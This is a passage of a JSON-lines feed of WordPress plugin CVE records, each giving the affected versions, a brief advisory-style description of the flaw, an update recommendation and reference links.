version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.5.2\\\/blocks\\\/TableOfContents.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.5.2\\\/blocks\\\/TableOfContents.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3053199\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3053199\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6561","slug":"featured-image-from-url","versionImpact":"4.5.3","versionEndExcluding":"4.5.4","description":"The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the featured image alt text in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4d5ae93-000e-4001-adfa-c11058032469?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4d5ae93-000e-4001-adfa-c11058032469?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/meta-box.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/meta-box.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/category.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/category.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009699%40featured-image-from-url%2Ftrunk&old=3003342%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009699%40featured-image-from-url%2Ftrunk&old=3003342%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1780","slug":"companion-sitemap-generator","versionEndExcluding":"4.5.3","description":"The Companion Sitemap Generator WordPress plugin before 4.5.3 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8176308f-f210-4109-9c88-9372415dbed3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8176308f-f210-4109-9c88-9372415dbed3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0876","slug":"wp-meta-seo","versionEndExcluding":"4.5.3","description":"The WP Meta SEO WordPress plugin before 4.5.3 does not authorize several ajax actions, allowing low-privilege users to make updates to certain data and leading to an arbitrary redirect vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0875","slug":"wp-meta-seo","versionEndExcluding":"4.5.3","description":"The WP Meta SEO WordPress plugin before 4.5.3 does not properly sanitize and escape inputs into SQL queries, leading to a blind SQL Injection vulnerability that can be exploited by subscriber+ users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d44e9a45-cbdf-46b1-8b48-7d934b617534\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d44e9a45-cbdf-46b1-8b48-7d934b617534\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2286","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_run_cleanup function. This makes it possible for unauthenticated attackers to invoke this function via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2285","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_switch_db function. This makes it possible for unauthenticated attackers to make changes to the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c659f6d-e02b-42ab-ba02-eb9b00602ad4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c659f6d-e02b-42ab-ba02-eb9b00602ad4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2284","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log Premium plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_switch_db function in versions up to, and including, 4.5.0. This makes it possible for authenticated attackers with subscriber-level or higher to make changes to the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e29fd6b-462a-42be-9a2a-b6717b20a937?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e29fd6b-462a-42be-9a2a-b6717b20a937?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2261","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the handle_ajax_call function in versions up to, and including, 4.5.0. This makes it possible for authenticated attackers, with subscriber-level access or higher, to obtain a list of users with accounts on the site. This includes ids, usernames and emails.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L70\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f51f0919-498e-4f86-a933-1b7f2c4a10a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f51f0919-498e-4f86-a933-1b7f2c4a10a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2286","slug":"wp-security-audit-log-premium","versionEndExcluding":"4.5.2","description":"The WP Activity Log for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_run_cleanup function. This makes it possible for unauthenticated attackers to invoke this function via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54356","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5","versionEndExcluding":"4.5.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in vCita.com Online Booking & Scheduling Calendar for WordPress by vcita allows Cross Site Request Forgery.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.5.","recommendation":"Update to version 4.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9872","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5.1","versionEndExcluding":"4.5.2","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_user_data_callback() function in all versions up to, and including, 4.5.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject malicious web scripts and update settings.","recommendation":"Update to version 4.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200129\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200129\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13475","slug":"small-package-quotes-ups-edition","versionImpact":"4.5.16","versionEndExcluding":"4.5.17","description":"The Small Package Quotes \u2013 UPS Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 4.5.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.5.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62680b5-e9e0-497f-b957-9b223a623917?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62680b5-e9e0-497f-b957-9b223a623917?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49821","slug":"wp-live-chat-software-for-wordpress","versionImpact":"4.5.15","versionEndExcluding":"4.5.16","description":"Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat \u2013 WP live chat plugin for WordPress.This issue affects LiveChat \u2013 WP live chat plugin for WordPress: from n\/a through 4.5.15.\n\n","recommendation":"Update to version 4.5.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-live-chat-software-for-wordpress\\\/wordpress-livechat-plugin-4-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-live-chat-software-for-wordpress\\\/wordpress-livechat-plugin-4-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4891","slug":"essential-blocks","versionImpact":"4.5.12","versionEndExcluding":"4.5.13","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tagName\u2019 parameter in versions up to, and including, 4.5.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1bcebb3-920b-40cc-aa5c-24a1f729b28d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1bcebb3-920b-40cc-aa5c-24a1f729b28d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/AdvancedHeading.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/AdvancedHeading.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087677\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087677\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6962","slug":"wp-meta-seo","versionImpact":"4.5.12","versionEndExcluding":"4.5.13","description":"The WP Meta SEO plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5.12 via the meta description. This makes it possible for unauthenticated attackers to disclose potentially sensitive information via the meta description of password-protected posts.","recommendation":"Update to version 4.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0323b54b-c15b-4d2d-9e8f-3df87c84dd49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0323b54b-c15b-4d2d-9e8f-3df87c84dd49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6961","slug":"wp-meta-seo","versionImpact":"4.5.12","versionEndExcluding":"4.5.13","description":"The WP Meta SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Referer\u2019 header in all versions up to, and including, 4.5.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca91e41d-b728-4eb0-86d5-043813d8c2c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca91e41d-b728-4eb0-86d5-043813d8c2c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6164","slug":"mainwp","versionImpact":"4.5.1.2","versionEndExcluding":"4.5.1.3","description":"The MainWP Dashboard  \u2013 WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to CSS Injection via the \u2018newColor\u2019 parameter in all versions up to, and including, 4.5.1.2 due to insufficient input sanitization. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary CSS values into the site tags.","recommendation":"Update to version 4.5.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73980a90-bb17-46e4-a0ea-691f80500fe3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73980a90-bb17-46e4-a0ea-691f80500fe3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/mainwp\\\/tags\\\/4.5.1.2&old=2996628&new_path=\\\/mainwp\\\/tags\\\/4.5.1.3&new=2996628&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/mainwp\\\/tags\\\/4.5.1.2&old=2996628&new_path=\\\/mainwp\\\/tags\\\/4.5.1.3&new=2996628&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10084","slug":"contact-form-7-dynamic-text-extension","versionImpact":"4.5","versionEndExcluding":"4.5.1","description":"The Contact Form 7 \u2013 Dynamic Text Extension plugin for WordPress is vulnerable to Basic Information Disclosure in all versions up to, and including, 4.5 via the CF7_get_post_var shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract the titles and text contents of private and password-protected posts, they do not own.","recommendation":"Update to version 4.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e051a83e-ad5a-4789-bfee-e03aa9d6a3fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e051a83e-ad5a-4789-bfee-e03aa9d6a3fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-dynamic-text-extension\\\/tags\\\/4.5.0\\\/includes\\\/shortcodes.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-dynamic-text-extension\\\/tags\\\/4.5.0\\\/includes\\\/shortcodes.php#L225\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1649","slug":"chatbot","versionEndExcluding":"4.5.1","description":"The AI ChatBot WordPress plugin before 4.5.1 does not sanitise and escape numerous of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea806115-14ab-4bc4-a272-2141cb14454a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea806115-14ab-4bc4-a272-2141cb14454a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54326","slug":"geo-my-wp","versionImpact":"4.5.0.4","versionEndExcluding":"4.5.1","description":"Missing Authorization vulnerability in Eyal Fitoussi GEO my WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GEO my WordPress: from n\/a through 4.5.0.4.","recommendation":"Update to version 4.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/geo-my-wp\\\/vulnerability\\\/wordpress-geo-my-wp-plugin-4-5-0-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/geo-my-wp\\\/vulnerability\\\/wordpress-geo-my-wp-plugin-4-5-0-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5531","slug":"employee-directory","versionImpact":"4.5.0","versionEndExcluding":"4.5.1","description":"The Employee Directory \u2013 Staff Listing & Team Directory Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3295945%40employee-directory&new=3295945%40employee-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3295945%40employee-directory&new=3295945%40employee-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/143c5f1f-032c-4207-9401-20f18efcad9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/143c5f1f-032c-4207-9401-20f18efcad9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47327","slug":"geo-my-wp","versionImpact":"4.5.0.3","versionEndExcluding":"4.5.0.4","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Eyal Fitoussi GEO my WordPress allows Reflected XSS.This issue affects GEO my WordPress: from n\/a through 4.5.0.3.","recommendation":"Update to version 4.5.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geo-my-wp\\\/wordpress-geo-my-wp-plugin-4-5-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geo-my-wp\\\/wordpress-geo-my-wp-plugin-4-5-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6330","slug":"geo-my-wp","versionImpact":"4.5.0.1","versionEndExcluding":"4.5.0.2","description":"The GEO my WP WordPress plugin before 4.5.0.2 does not prevent unauthenticated attackers from including arbitrary files in PHP's execution context, which leads to Remote Code Execution.","recommendation":"Update to version 4.5.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95b532e0-1ffb-421e-b9c0-de03f89491d7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95b532e0-1ffb-421e-b9c0-de03f89491d7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13742","slug":"worpit-admin-dashboard-plugin","versionImpact":"4.4.5","versionEndExcluding":"4.5.0","description":"The iControlWP \u2013 Multiple WordPress Site Manager plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.5 via deserialization of untrusted input from the reqpars parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 4.5.0, or a newer patched 